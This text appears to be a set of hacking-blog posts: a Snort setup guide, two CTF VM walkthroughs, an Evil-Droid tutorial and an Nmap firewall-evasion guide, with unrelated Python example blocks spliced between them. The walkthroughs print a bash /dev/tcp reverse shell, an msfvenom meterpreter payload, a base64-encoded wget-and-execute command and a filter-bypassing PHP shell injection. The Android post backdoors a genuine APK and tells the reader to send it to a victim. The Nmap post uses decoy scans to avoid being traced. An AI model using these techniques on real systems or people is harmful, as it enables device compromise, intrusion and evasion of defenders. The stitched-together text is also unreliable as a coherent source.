Now execute the command below to verify the installation by having Snort print its version:

snort -V

The first part of the Snort installation finishes here.

Configure Snort in IDS Mode on the Network

Execute the commands below to create the snort user and group; Snort will run as this unprivileged user.

sudo groupadd snort

sudo useradd snort -r -s /sbin/nologin -c SNORT_IDS -g snort

The commands above create a group “snort” and add a user “snort” to it.

Next we need to create the directories Snort expects when running in IDS mode on the network. Snort stores configuration files in /etc/snort, rules in /etc/snort/rules, compiled rules in /usr/local/lib/snort_dynamicrules, and its logs in /var/log/snort.

Type the commands below to create the Snort directories:

sudo mkdir /etc/snort

sudo mkdir /etc/snort/rules

sudo mkdir /etc/snort/rules/iplists

sudo mkdir /etc/snort/preproc_rules

sudo mkdir /usr/local/lib/snort_dynamicrules

sudo mkdir /etc/snort/so_rules    

Type the commands below to create the files that store rules and IP lists:

sudo touch /etc/snort/rules/iplists/black_list.rules

sudo touch /etc/snort/rules/iplists/white_list.rules

sudo touch /etc/snort/rules/local.rules

sudo touch /etc/snort/sid-msg.map

Type the commands below to create the logging directories:

sudo mkdir /var/log/snort

sudo mkdir /var/log/snort/archived_logs

Type the commands below to adjust permissions:

sudo chmod -R 5775 /etc/snort

sudo chmod -R 5775 /var/log/snort

sudo chmod -R 5775 /var/log/snort/archived_logs

sudo chmod -R 5775 /etc/snort/so_rules

sudo chmod -R 5775 /usr/local/lib/snort_dynamicrules

Snort requires some configuration files and the dynamic preprocessors to be copied from the Snort source folder into /etc/snort, so execute the commands below for that.

cd ~/snort_src/snort-2.9.11/etc/

sudo cp *.conf* /etc/snort

sudo cp *.map /etc/snort

sudo cp *.dtd /etc/snort

cd ~/snort_src/snort-2.9.11/src/dynamic-preprocessors/build/usr/local/lib/snort_dynamicpreprocessor/

sudo cp * /usr/local/lib/snort_dynamicpreprocessor/

Editing the Snort configuration file

Now we need to comment out all the rulesets with the following command:

sudo sed -i "s/include \$RULE\_PATH/#include \$RULE\_PATH/" /etc/snort/snort.conf

Then open the configuration file with gedit to make some changes inside it.

sudo gedit /etc/snort/snort.conf

Scroll down to around line 45 to specify the network you are protecting, as shown in the image.

# Setup the network addresses you are protecting

ipvar HOME_NET 192.168.1.1/24

Now scroll down to around line 108 to set the paths of the rule folders you created above for storing Snort rules, as shown in the image below.

var RULE_PATH /etc/snort/rules

var SO_RULE_PATH /etc/snort/so_rules

var PREPROC_RULE_PATH /etc/snort/preproc_rules

var WHITE_LIST_PATH /etc/snort/rules/iplists

var BLACK_LIST_PATH /etc/snort/rules/iplists

One more time, scroll down to around line 546 and uncomment the highlighted line.

include $RULE_PATH/local.rules

Save and close the file once all the edits to the Snort configuration file are done.
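A quick sanity check for the hand edits above, written as an added example that is not the article's or the Snort project's code. It parses a constructed snort.conf excerpt (not the real shipped file) and reports whether HOME_NET has been narrowed from `any`, whether the five rule-path variables are set, and whether `include $RULE_PATH/local.rules` is the only active ruleset after the sed pass. The `snort -T` run that follows validates the whole file; this only confirms that the edits you just made landed where you expect, which is the usual reason `-T` fails on a fresh install.

```python
import re

# Constructed excerpt of a snort.conf (not the real distributed file) showing the
# state the article aims for: HOME_NET narrowed, rule-path variables set, and
# every $RULE_PATH include commented out by the sed command except local.rules.
SAMPLE_CONF = """\
# Setup the network addresses you are protecting
ipvar HOME_NET 192.168.1.1/24
ipvar EXTERNAL_NET any
var RULE_PATH /etc/snort/rules
var SO_RULE_PATH /etc/snort/so_rules
var PREPROC_RULE_PATH /etc/snort/preproc_rules
var WHITE_LIST_PATH /etc/snort/rules/iplists
var BLACK_LIST_PATH /etc/snort/rules/iplists
#include $RULE_PATH/app-detect.rules
#include $RULE_PATH/attack-responses.rules
include $RULE_PATH/local.rules   
"""

# The same excerpt as it looks right after the sed pass and before the gedit edits:
# HOME_NET still 'any' and local.rules still commented out (also constructed).
UNEDITED_CONF = (
    SAMPLE_CONF
    .replace("ipvar HOME_NET 192.168.1.1/24", "ipvar HOME_NET any")
    .replace("\ninclude $RULE_PATH/local.rules", "\n#include $RULE_PATH/local.rules")
)

REQUIRED_VARS = ("RULE_PATH", "SO_RULE_PATH", "PREPROC_RULE_PATH",
                 "WHITE_LIST_PATH", "BLACK_LIST_PATH")


def parse_snort_conf(text):
    """Collect var/ipvar definitions plus active and commented-out include lines."""
    cfg = {"vars": {}, "ipvars": {}, "includes": [], "commented_includes": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = re.match(r"#\s*include\s+(\S+)", line)
        if m:                                   # a ruleset the sed pass disabled
            cfg["commented_includes"].append(m.group(1))
            continue
        if line.startswith("#"):
            continue
        parts = line.split(None, 2)
        if parts[0] == "var" and len(parts) == 3:
            cfg["vars"][parts[1]] = parts[2]
        elif parts[0] == "ipvar" and len(parts) == 3:
            cfg["ipvars"][parts[1]] = parts[2]
        elif parts[0] == "include" and len(parts) >= 2:
            cfg["includes"].append(parts[1])
    return cfg


def check_snort_conf(text):
    """Return a list of problems; an empty list means the article's edits are in place."""
    cfg = parse_snort_conf(text)
    problems = []
    home = cfg["ipvars"].get("HOME_NET")
    if home is None:
        problems.append("HOME_NET is not defined")
    elif home.lower() == "any":
        problems.append("HOME_NET is 'any'; set it to the network you are protecting")
    for name in REQUIRED_VARS:
        if name not in cfg["vars"]:
            problems.append(f"var {name} is not set")
    if "$RULE_PATH/local.rules" not in cfg["includes"]:
        problems.append("include $RULE_PATH/local.rules is missing or commented out")
    return problems


def active_rulesets(text):
    """The rule files Snort will actually load from $RULE_PATH."""
    return [p for p in parse_snort_conf(text)["includes"] if p.startswith("$RULE_PATH/")]


if __name__ == "__main__":
    for label, conf in (("edited", SAMPLE_CONF), ("unedited", UNEDITED_CONF)):
        print(label, "->", check_snort_conf(conf) or "OK", active_rulesets(conf))
```

Pointing `check_snort_conf` at the real file is a one-liner (`check_snort_conf(open("/etc/snort/snort.conf").read())`); keeping the parser separate from the checks means the same parse can later answer other questions, such as which rulesets are still disabled once you start re-enabling the registered rules.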

Now once again we need to verify the configuration, so execute the following command to test it.

sudo snort -T -i eth0 -c /etc/snort/snort.conf

It will parse the complete file and test the configuration automatically, as shown in the image below:

Great!! We have successfully configured Snort as an IDS to protect our network.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here


Hack the Depth VM (CTF Challenge)

Wed, 29/Nov/2017 - 15:28

Hello friends! Today we are going to take on another CTF challenge known as Depth. The credit for making this VM goes to “Dan Lawson”, and it is another boot2root challenge where we have to root the server to complete it. You can download this VM here.

Let’s Breach!!!

Here I have it at 192.168.1.135, but you may have a different one.

Let’s enumerate the ports using nmap.

nmap -sV 192.168.1.135

Nmap scan shows us port 8080 is open, so we open it in our browser.

We don’t find anything on the index page, but nikto shows us a page called test.jsp.

nikto -h http://192.168.1.135:8080

We open it and find a page that is used for listing directories on the system.

We run ‘ls -al’ to check whether it works.

ls -al /tmp

When we look inside the /home/ folder we find a user called bill.

ls -l /home

Now we find that the site has a vulnerability: we can turn this listing utility into command injection. We find that with the help of the ssh command we can bypass the firewall.

ssh bill@localhost sudo -l

We find that we can run commands using ssh. Now we disable the firewall.

ssh bill@localhost sudo ufw disable

Now, to gain a reverse shell, we set up our listener using netcat.

nc -lvp 4444

After disabling the firewall, we use bash reverse shell to gain access.

ssh bill@localhost bash -i >& /dev/tcp/192.168.1.135/4444 0>&1

As soon as we get the reverse shell we go into the root folder, where we find a file called flag.

We open the flag file and find a congratulatory message for the completion of the CTF challenge.
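The bug behind this box is a directory-listing page that hands user text to a shell. The following is an added example, not code from the Depth VM or the walkthrough: the same listing feature in Python, first in the injectable form and then in a shell-free form confined to one directory tree. The jail root, the sample files and the function names are this example's assumptions; demo() builds its own temporary jail so the checks can be run anywhere.

```python
"""Directory listing: shell-injectable form beside a confined, shell-free form
(added example, not the VM's test.jsp)."""
import os
import subprocess
import tempfile
from pathlib import Path


def list_dir_unsafe(user_path):
    """Vulnerable form: user text is spliced into a shell command line, so a
    'list a directory' feature becomes 'run any command'. Kept for contrast
    only; demo() never calls it."""
    return subprocess.run("ls -al " + user_path, shell=True,
                          capture_output=True, text=True).stdout


def resolve_inside(jail, user_path):
    """Return the absolute path of user_path within jail, or None if it would
    escape (via '..', a leading '/', or a symlink that points outside)."""
    root = Path(jail).resolve()
    target = (root / user_path.lstrip("/")).resolve()
    if target == root or root in target.parents:
        return target
    return None


def list_dir_safe(jail, user_path):
    """Hardened form: no shell, no string concatenation; the path is checked
    against the jail before the filesystem is touched."""
    target = resolve_inside(jail, user_path)
    if target is None or not target.is_dir():
        raise PermissionError("refusing to list %r" % user_path)
    return sorted(entry.name for entry in os.scandir(target))


def demo():
    """Build a throwaway jail (constructed sample data) and exercise the checks.
    Returns (listing of 'docs', traversal rejected?, metacharacters rejected?)."""
    with tempfile.TemporaryDirectory() as tmp:
        docs = Path(tmp) / "docs"
        docs.mkdir()
        (docs / "readme.txt").write_text("constructed sample file\n")
        listing = list_dir_safe(tmp, "docs")
        escaped = resolve_inside(tmp, "../../etc") is None
        try:
            list_dir_safe(tmp, "docs; id")  # just a file name that does not exist
            injected = False
        except PermissionError:
            injected = True
    return listing, escaped, injected


if __name__ == "__main__":
    print(demo())
```

The point of resolve_inside is that the check happens after Path.resolve(), so `..` segments and symlinks are collapsed before the comparison; a string-prefix check on the raw input would not catch `docs/../../etc`.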

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the Depth VM (CTF Challenge) appeared first on Hacking Articles.


Hack the G0rmint VM (CTF Challenge)

Mon, 27/Nov/2017 - 20:26

Hello friends! Today we are going to take another CTF challenge known as G0rmint. The credit for making this VM goes to “Noman Riffat”, and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start by finding the IP of the VM (here I have it at 192.168.1.134, but you will have to find your own).

netdiscover

Use nmap for port enumeration.

nmap 192.168.1.134

The Nmap scan shows that port 80 is open, so we open the IP address in our browser.

We don’t find any page, so we use dirb to find directories for more information.

dirb http://192.168.1.134/

We open robots.txt and find a directory called /g0rmint/

When we open the directory we find a login page.

We take a look at the source code for more information.


In the source code we find a backup directory called s3cretbackupdirect0ry/. We use dirb to enumerate files and pages in that directory.

dirb http://192.168.1.134/g0rmint/s3cretbackupdirect0ry

We find a page called info.php; when we open it we find a file named backup.zip.

We download the file for further information.

We extract the zip file and find that the file contains the source code for the webpage.

Now we look inside style.css for the name of the author.

cat style.css | grep Author

We use these details as the username and email for the password reset.

We now take a look at the reset.php file.

We find that the new password is derived from the time at which we reset it. We write a PHP file that generates the password from the time displayed on the page.

Now we generate the password using our php script.

We go to the login page, use the email we found in the CSS file and the password we just generated, and log in.

Now that we are logged in we take a look at the log file. In config.php we find that the logs are stored in the s3r3t-dir3ct0ry-f0r-l0gs/ directory, in files named in the format yy-mm-dd.php.

Now we use the current date to open the log file.

Now we upload a basic PHP shell through the email address field. We wrap it in a base64 decode so that we can bypass the input filter.

Now we convert our commands to base64 and use the encoded strings to execute our commands on the server.

When we execute our command the server runs it and we are able to see the files in that directory of the server.

Now we create an ELF shell with msfvenom.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.116 lport=4444 -f elf > /var/www/html/shell

To upload our shell, we convert our commands to base64.

echo 'wget http://192.168.1.116/shell; chmod +x shell; ./shell' | base64

Now we setup our listener using metasploit.

msf > use multi/handler

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.116

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

Now when we execute our command we get our reverse shell.

Going through the files in the /var/www folder we find a file called backup.zip. When we try to extract it we find that it can only be extracted into the tmp folder, so we extract the zip file to /var/tmp.

unzip backup.zip -d /var/tmp

After extracting the zip file we look inside the extracted folder and find a SQL file.

When we open the file we find an MD5-hashed password for the user g0rmint.

cat /var/tmp/db.sql | grep noman

When we crack the MD5 hash we find the password ‘tayyab123’.

We use this to connect through ssh.

ssh g0rmint@192.168.1.134

After connecting through ssh we use the same password to gain root access.

When we get root access we go to the root folder, where we find a file called flag.txt. When we open the file we get a congratulatory message for completing the VM.
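Two credential weaknesses carry this box: a reset password that is a function of the reset time, and an unsalted MD5 hash in the database dump. As an added example that is not the VM's reset.php or any code from the walkthrough, here is each weakness in Python beside its safe form. The time-based generator is a constructed illustration of the pattern, not the VM's actual algorithm; the scrypt parameters and the storage format are this example's own choices.

```python
"""Predictable vs random reset passwords, and unsalted MD5 vs salted scrypt
storage (added example; the weak generator is a constructed illustration)."""
import hashlib
import hmac
import secrets

SCRYPT_PARAMS = dict(n=2 ** 14, r=8, p=1)  # ~16 MiB per hash; tune for your server


def time_based_reset_password(reset_epoch):
    """Weak: a pure function of the clock, so anyone who can read the page's
    timestamp recomputes the password, which is exactly what the walkthrough does."""
    return hashlib.md5(str(int(reset_epoch)).encode()).hexdigest()[:10]


def random_reset_password():
    """Safe: drawn from the OS CSPRNG, unrelated to time or any visible value."""
    return secrets.token_urlsafe(12)


def md5_store(password):
    """Weak storage as seen in db.sql: unsalted MD5, reversed by lookup tables."""
    return hashlib.md5(password.encode()).hexdigest()


def scrypt_store(password, salt=None):
    """Safe storage: a per-user random salt plus a memory-hard KDF."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return "scrypt$%s$%s" % (salt.hex(), digest.hex())


def scrypt_verify(stored, password):
    """Recompute with the stored salt and compare in constant time."""
    algo, salt_hex, digest_hex = stored.split("$")
    if algo != "scrypt":
        return False
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), **SCRYPT_PARAMS)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    t = 1511800000  # constructed reset time
    print("same time, same password:", time_based_reset_password(t) == time_based_reset_password(t))
    print("random:", random_reset_password(), random_reset_password())
    stored = scrypt_store("example-password")
    print(stored, scrypt_verify(stored, "example-password"), scrypt_verify(stored, "wrong"))
```

A reset flow should also expire the temporary credential after one use and a short window; the generator alone does not give you that.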

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the G0rmint VM (CTF Challenge) appeared first on Hacking Articles.


Android Mobile Exploitation with Evil-Droid

Mon, 27/Nov/2017 - 18:04

Hello friends! Today you will learn how to generate an APK payload with the help of “Evil-Droid”. It is a tool used to compromise Android devices from an attacker’s point of view; we are using it only for educational purposes.

Evil-Droid is a framework that creates, generates and embeds APK payloads to penetrate Android platforms.

Requirement:

Attacker: Kali Linux

Target: Android

Lets Begin !!

Open the terminal in your Kali Linux and execute the command below to download it from GitHub.

git clone https://github.com/M4sc3r4n0/Evil-Droid.git

Now open the downloaded folder in the terminal and type the command below to give full permissions to the script “evil-droid”.

chmod 777 evil-droid

Now execute the command below to run the script and launch the Evil-Droid application.

./evil-droid

When you execute the above command Evil-Droid will start as shown in the image below. It begins by testing the internet connection and its dependencies against the tools available in Kali Linux on its own.

Then a prompt will pop up to confirm the Evil-Droid framework requirements; here select the option “yes”.

Now the Evil-Droid framework opens, ready to hack a remote Android platform through the options below.

[1] APK MSF

[2] BACKDOOR APK ORIGINAL (OLD)

[3] BACKDOOR APK ORIGINAL (NEW)

[4] BYPASS AV APK (ICON CHANGE)

[5] START LISTENER

[c] CLEAN

[q] QUIT

[?] Select

From the image below you can see that we chose the option “BACKDOOR APK ORIGINAL”.

After that another prompt will pop up to set LHOST [attacker’s IP] for the reverse connection. Enter your Kali Linux IP in the text field as shown in the image below.

After that another prompt will pop up to set LPORT for the reverse connection, as shown in the image below.

In the next prompt enter the name you want to give your APK payload, as shown in the image below. Here I gave my payload the name baidu-browser.

Once everything is set for generating the APK payload, the attacker finally gets a list of payload options to choose the type of payload to generate, as shown in the image below.

Here I selected “android/meterpreter/reverse_http” as the payload.

Now download any original APK file from Google in order to hide your payload in that file. Here I downloaded baidu.apk to hide my baidu-browser payload inside it; you can download any other APK file of your choice.

This will now generate a malicious baidu.apk with our backdoor hidden inside it, as shown in the image below. Now copy this malicious APK from the path /root/Evil-Droid/evilapk/baidu-browser.apk and send it to the victim.

On the other hand, another prompt will pop up to choose one of the following options:

  • Multi-Handler
  • Attack-vector
  • Main menu
  • Exit

From the image below you can observe that I chose “multi handler” for the reverse connection from the victim’s system.

Now it will launch the multi-handler and start a reverse TCP handler on the attacker machine, as shown in the image below. As soon as the victim downloads and runs the malicious baidu.apk, the attacker gets unauthorized access to the device on his machine.

Great!! From the image below you can observe that meterpreter session 1 is opened.

meterpreter> sysinfo

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here


The post Android Mobile Exploitation with Evil-Droid appeared first on Hacking Articles.


Understanding Guide to Nmap Firewall Scan (Part 1)

Thu, 23/Nov/2017 - 21:10

Hello friends, you have probably used Nmap many times to scan a network and enumerate the active port services of a target machine, but in some scenarios it is not possible to scan with the basic scan methods, especially when a firewall filter is in place.

Today we are going to demonstrate “Nmap firewall scan” by making use of iptables rules, and try to bypass the firewall filter to perform advanced Nmap scanning.

Let’s Begin!!

Attacker’s IP: 192.168.0.107 [kali linux]

Target’s IP: 192.168.0.101 [ubuntu]

ANALYSIS TCP SCAN

Open the terminal in your Kali Linux and execute the following command to perform a TCP [sT] scan for open port enumeration.

nmap -sT -p22 192.168.0.101

From the image below you can observe that we scanned port 22 and the result shows that port 22 is open for the SSH service.

When you use Wireshark to capture the packets sent during a TCP scan, there are a few things to notice: the “flags, total length and time to live [TTL]” (total length and TTL are in the layer-3 header).

The following table contains the flags, data length and TTL for the different scanning methods:

Scan name       Flags                                          Data length   TTL
-sT (TCP)       SYN →, ← SYN/ACK, ACK →, RST/ACK →             60            64
-sS (Stealth)   SYN →, ← SYN/ACK, RST/ACK →                    44            <64 (less than 64)
-sF (Finish)    FIN →                                          40            <64 (less than 64)
-sN (Null)      NULL →                                         40            <64 (less than 64)
-sX (Xmas)      FIN, PSH, URG →                                40            <64 (less than 64)

The Wireshark image below shows the network traffic generated while the Nmap TCP scan is running; the first stream is the SYN packet, which contains the following information:

Total Length: 60 [data length excluding the 14 bytes of Ethernet]

Time to live: 64 [the initial TTL a Linux system uses for TCP communication]

Reject SYN Flag with IPTables

As we know there is a constant fight between security researchers and attackers; to increase network security the admin applies a firewall filter which prevents the 3-way handshake on the network and stops the attacker from performing a TCP scan by rejecting the SYN packet.

Execute the command below in Ubuntu to block SYN packets:

iptables -I INPUT -p tcp --tcp-flags ALL SYN -j REJECT --reject-with tcp-reset

iptables works as the firewall on Linux operating systems, and the above rule rejects SYN packets to prevent TCP scans.

Now that SYN packets are rejected by the firewall on the target network, the attacker is unable to enumerate open ports on the target even though the services are running.

When we [the attacker] run the TCP scan again it finds port 22 closed, as shown in the image.

Bypass SYN Filter

When the attacker fails to enumerate open ports using a TCP scan, there are some advanced scanning methods that bypass this type of firewall filter, as given below:

FIN Scan

A FIN packet is used to terminate the TCP connection between the source and destination ports, typically after the data transfer is complete. Instead of a SYN packet, Nmap starts a FIN scan by sending a FIN packet.

FIN scan only works on Linux machines and does not work on the latest versions of Windows.

nmap -sF -p 22 192.168.0.101

From given image you can observe the result that port 22 is open.

When you capture the network traffic for the FIN packet you can confirm that the “data length” is 40 and the “TTL” is always less than 64; moreover no SYN packet is used to establish TCP communication with the target machine.

NULL Scan

A Null scan is a series of TCP packets with no flags set (the flags field is all zeros), and since no flags are set the destination does not know how to reply to the request. It discards the packet and sends no reply, which indicates that the port is open.

Null scan only works on Linux machines and does not work on the latest versions of Windows.

nmap -sN -p 22 192.168.0.101

From given image you can observe the result that port 22 is open.


Similarly, when you capture the network traffic for the NULL packet you can confirm that the “data length” is 40 and the “TTL” is always less than 64; here too no SYN packet is used to establish TCP communication with the target machine.

XMAS Scan

This scan sets the FIN, PSH and URG flags of the TCP header, lighting the packet up like a Christmas tree. When the source sends a FIN, PSH, URG packet to a specific port and the port is open, the destination discards the packet and sends no reply to the source.

Xmas scan only works on Linux machines and does not work on the latest versions of Windows.

nmap -sX -p 22 192.168.0.101

From given image you can observe the result that port 22 is open.

Similarly, when you capture the network traffic for the Xmas scan you will see the combination of FIN, PSH and URG flags; here too you can confirm that the “data length” is 40 and the “TTL” is always less than 64.

Conclusion: a TCP connection is established by a 3-way handshake, and if the firewall discards the 3-way handshake to prevent TCP communication, FIN, NULL and XMAS scans can still be used to enumerate ports.

Reject  FIN Packet Using IPTABLES Rule

Again the admin adds a new firewall filter to prevent network enumeration by FIN scan, which rejects FIN packets on the network.

Execute the command below in Ubuntu to block FIN packets:

iptables -I INPUT -p tcp --tcp-flags ALL FIN -j REJECT --reject-with tcp-reset

Now when the attacker tries an advanced scan using the FIN scan he is not able to enumerate open port information, which you can confirm from the image below.

At this point only Null and Xmas scans are still useful for port enumeration, unless and until the admin blocks the traffic from these scans as well. From the image below you can confirm that port 22 is closed when the FIN scan is performed but open when the Null and Xmas scans are performed.

To protect your network from NULL and Xmas scans too, apply the iptables rules below for Null and Xmas respectively:

iptables -I INPUT -p tcp --tcp-flags ALL NONE -j REJECT --reject-with tcp-reset

iptables -I INPUT -p tcp --tcp-flags ALL FIN,PSH,URG -j REJECT --reject-with tcp-reset

Reject  Data-length with IPTables

As discussed above, TCP communication depends on three factors: the “flags”, which I demonstrated above, the “TTL”, which I will demonstrate later, and the “data length”, which I am going to demonstrate now.

So when the admin wants to secure his network from TCP scans again, instead of applying a firewall filter on the TCP flags he can also apply a rule that checks for a “data length” of a specific size and then drops the incoming traffic for the TCP connection. Execute the command below to apply a firewall rule on “data length”; by default 60 is the data length used by the TCP scan, which you can confirm from the table given above.

iptables -I INPUT -p tcp -m length --length 60 -j REJECT --reject-with tcp-reset

Now that a data length of 60 bytes is blocked by the firewall on the target network, the attacker is unable to enumerate open ports on the target even though the service is running.

When we [the attacker] run the TCP scan again it finds port 22 closed, as shown in the image.

Bypass Data-Length Restriction with Stealth Scan

When the attacker fails to enumerate open ports using the TCP [sT] scan, there are some scanning methods that bypass this type of firewall filter, as given below:

nmap -sS -p 22 192.168.0.101

From the image below you can observe that port 22 is open when the stealth scan [sS] is executed; this is because the data length sent by the stealth scan is 44 by default for a TCP connection.

The stealth scan is very similar to the TCP scan and is also known as “half open” scanning, because it sends a SYN packet, receives a SYN/ACK packet from the listening port and records the result without sending the final ACK to the listening port. Therefore if the “SYN packet” is blocked by the firewall this scan fails; it only helps when data length = 60 or TTL = 64 is what the firewall blocks.

Fragment Scan

The -f option causes the requested scan to use tiny fragmented IP packets. The idea is to split up the TCP header over several packets to make it harder for packet filters, intrusion detection systems, and other annoyances to detect what you are doing. So a 20-byte TCP header would be split into three packets, two with eight bytes of the TCP header, and one with the final four.

nmap -f -p22 192.168.0.101

When you capture the network traffic you can confirm that the “data length” is 28, excluding the 14 bytes of Ethernet, and the “TTL” is always less than 64.

Similarly you can use the FIN, Null and Xmas scans, whose data length is 40, to enumerate open ports on the target network.

If the admin applies firewall filters rejecting data lengths 40, 44 and 60, none of the scans above, basic or advanced, will work; the following iptables rules do that.

iptables -I INPUT -p tcp -m length --length 60 -j REJECT --reject-with tcp-reset

iptables -I INPUT -p tcp -m length --length 44 -j REJECT --reject-with tcp-reset

iptables -I INPUT -p tcp -m length --length 40 -j REJECT --reject-with tcp-reset

From the image below you can observe that the FIN, Null, Xmas and stealth scans are now all unable to enumerate open ports on the target network. All of them show the port as closed even though the service is running.

Data Length Scan

When the attacker is unable to enumerate open ports with the scans above, he can try the Nmap “data-length scan”, which bypasses the above firewall filters too.

By default each Nmap scan has a fixed data length, as explained above; this option lets you append random data of a length of your choice.

With the following command the attacker tries to enumerate open ports with a data length of 12:

nmap --data-length 12 -p 22 192.168.0.101

Awesome!! From given below image you can observe port 22 is open.

When you use Wireshark to capture the network traffic generated by this scan you will see a “Total length” of 44 for TCP.

The size of the SSH packet is 70 bytes; subtract the 14 bytes of Ethernet and 56 bytes remain; now subtract the 12 bytes of data length you defined and a total length of 44 bytes is left.

Here, 70 bytes -14 bytes[Ethernet] = 56 bytes

Now, 56 bytes -12 bytes[data-length] = 44 bytes

Reject Length size 1 to 100

If the admin is aware of the Nmap data-length scan he should block a whole range of data lengths to prevent network scanning by the attacker, using the following iptables rule.

iptables -I INPUT -p tcp -m length --length 1:100 -j REJECT --reject-with tcp-reset

Now the firewall analyses the traffic arriving on its network, rejects packets whose data length is between 1 byte and 100 bytes, and refuses to establish TCP connections with the attacker.

Now if the attacker sends a data length between 1 byte and 100 bytes the port scan fails to find the open state, which you can confirm from the image below: when data lengths of 12 bytes and 10 bytes are sent in the two scans, port 22 is closed. As soon as the attacker sends a data length of 101 bytes, which is more than 100 bytes, port 22 shows as open.

TTL Scan

Reject TTL size with IPTables

After applying firewall filters on “TCP flags” and “data length” to secure the network from enumeration, now add a firewall filter for “Time To Live”, i.e. TTL.

If you look at the table given at the beginning of the article you will notice that only the TCP scan [sT] has a TTL value equal to 64; the remaining scans always have a TTL value less than 64. Hence if the admin applies a firewall filter rejecting TTL value 64 it prevents TCP scanning of the network.

The command below adds a new firewall rule that checks for a TTL value of 64 and rejects the packet.

iptables -I INPUT -p tcp -m ttl --ttl 64 -j REJECT --reject-with tcp-reset

Now if the attacker uses the “TCP [sT] scan” to enumerate port information it always shows “port is closed”, whereas if another scan is performed the attacker gets accurate information about the port state. From the image below you can observe that when the “basic scan” is executed to enumerate port details it reports “port 22 is open”.

This happens because the TTL value for the “basic scan” is less than 64 and the target’s firewall rejects only a TTL value equal to 64. When we captured the network traffic generated by this scan we found that the basic scan used a TTL value of 56.

Now the admin adds one more layer of security to protect his network from every type of scan, by rejecting TTL values below 64 as well as 64.

iptables -I INPUT -p tcp -m ttl --ttl-lt 64 -j REJECT --reject-with tcp-reset

Now the firewall analyses the traffic arriving on its network and, together with the previous --ttl 64 rule, blocks packets whose TTL is 64 or less.

Bravo!! The firewall rule above is more powerful than the previous rules because it completely blocks both the Nmap “basic scan” and the “advanced scans”; if you look at the image below you will observe that the TCP [sT], FIN [sF], data-length and stealth [sS] scans have all failed and show the port as closed.

Still, there is a second way to enumerate the port for an accurate result: setting a TTL value greater than 64. The following command performs the port scan with a defined TTL value of 65, which bypasses the firewall filter because 65 is greater than 64.

nmap -p22 --ttl 65 192.168.0.101

So only if the attacker is lucky enough to guess the rejected TTL value or the firewall rule, and applies the correct TTL, does the port enumeration succeed; as shown in the image, port 22 is open.

Source Port Scan

Source Port Filter with IPTables

One more step to secure the network from scanning is to apply a firewall rule that allows traffic from one specific source port only and rejects traffic from all other ports.

iptables -I INPUT -p tcp --sport 80 -j ACCEPT

iptables -A INPUT -p tcp -j REJECT --reject-with tcp-reset

Now the basic and advanced Nmap scans fail again to enumerate the open port state, and only if the attacker correctly guesses the firewall filter can he run the Nmap source port scan to enumerate port details.

The -g option sets the source port from which the packets are sent to the destination port.

nmap -g 80 192.168.0.101

The above command sends its traffic from port 80, so the firewall allows the traffic from source port 80 and the scan reports the state of the open ports.

Decoy Scan

Set Firewall Log to capture Attacker IP

The admin can set a firewall rule that logs the IP from which traffic arrives; it only writes system log entries, capturing the IP of the attacker who is performing the scan.

iptables -I INPUT -p tcp -j LOG --log-prefix "kaliNmap" --log-level 4

Now if the attacker performs any type of network scan on the target system, the firewall generates a log entry that captures his IP.

Escape from Firewall log

Always take some precautions to protect yourself while performing network scanning, because in Windows a “honey pot” and in Linux “iptables” will log the attacker’s IP. In such a situation you are advised to use a Decoy Scan for port enumeration.

Decoy Scan

The -D option makes it appear that the decoy hosts are scanning the target network as well. It does not hide your own IP, but it makes your IP one of a crowd of others apparently scanning the victim at the same time. This not only makes the scan look scarier but reduces the chance of your scan being traced back to you (it is difficult to tell which system is the “real” source).

nmap -D 216.58.203.164 192.168.0.101

In the above command we used a Google IP as a decoy, which shows up as an attacker IP in the firewall log.

tail -f /var/log/syslog

When the admin reads the system log he will take the highlighted IP as the attacker’s IP and may apply a filter on that IP to block incoming traffic from it.
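On the admin's side the kaliNmap log entries are more useful than a single IP to block: the flags, LEN and TTL fields in each line are exactly the columns of the table given at the beginning of the article, so the scan type can be recovered from the log, and a decoy scan shows up as several sources probing the same port. The following is an added example, not code from the article: it parses iptables LOG lines (the `KEY=VALUE` fields plus bare flag tokens such as `SYN` or `FIN PSH URG`, which is the kernel's LOG format), classifies each probe with the article's table, and tallies scan types per source. The sample log lines are constructed, and the function names are this example's own.

```python
"""Classify Nmap probes from iptables LOG lines using the flag/length/TTL table
(added example; sample lines are constructed in the kernel LOG format)."""
import re
from collections import Counter, defaultdict

TCP_FLAGS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}

# Constructed sample lines: one probe of each type from the article, plus one
# from the decoy IP used in the -D example. The prefix "kaliNmap" has no
# trailing space in the rule above, so it runs straight into "IN=".
SAMPLE_LOG = [
    "Nov 23 21:10:01 ubuntu kernel: kaliNmapIN=eth0 OUT= SRC=192.168.0.107 DST=192.168.0.101 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=1 DF PROTO=TCP SPT=40001 DPT=22 WINDOW=29200 RES=0x00 SYN URGP=0",
    "Nov 23 21:10:02 ubuntu kernel: kaliNmapIN=eth0 OUT= SRC=192.168.0.107 DST=192.168.0.101 LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=2 PROTO=TCP SPT=40002 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0",
    "Nov 23 21:10:03 ubuntu kernel: kaliNmapIN=eth0 OUT= SRC=192.168.0.107 DST=192.168.0.101 LEN=40 TOS=0x00 PREC=0x00 TTL=50 ID=3 PROTO=TCP SPT=40003 DPT=22 WINDOW=1024 RES=0x00 FIN URGP=0",
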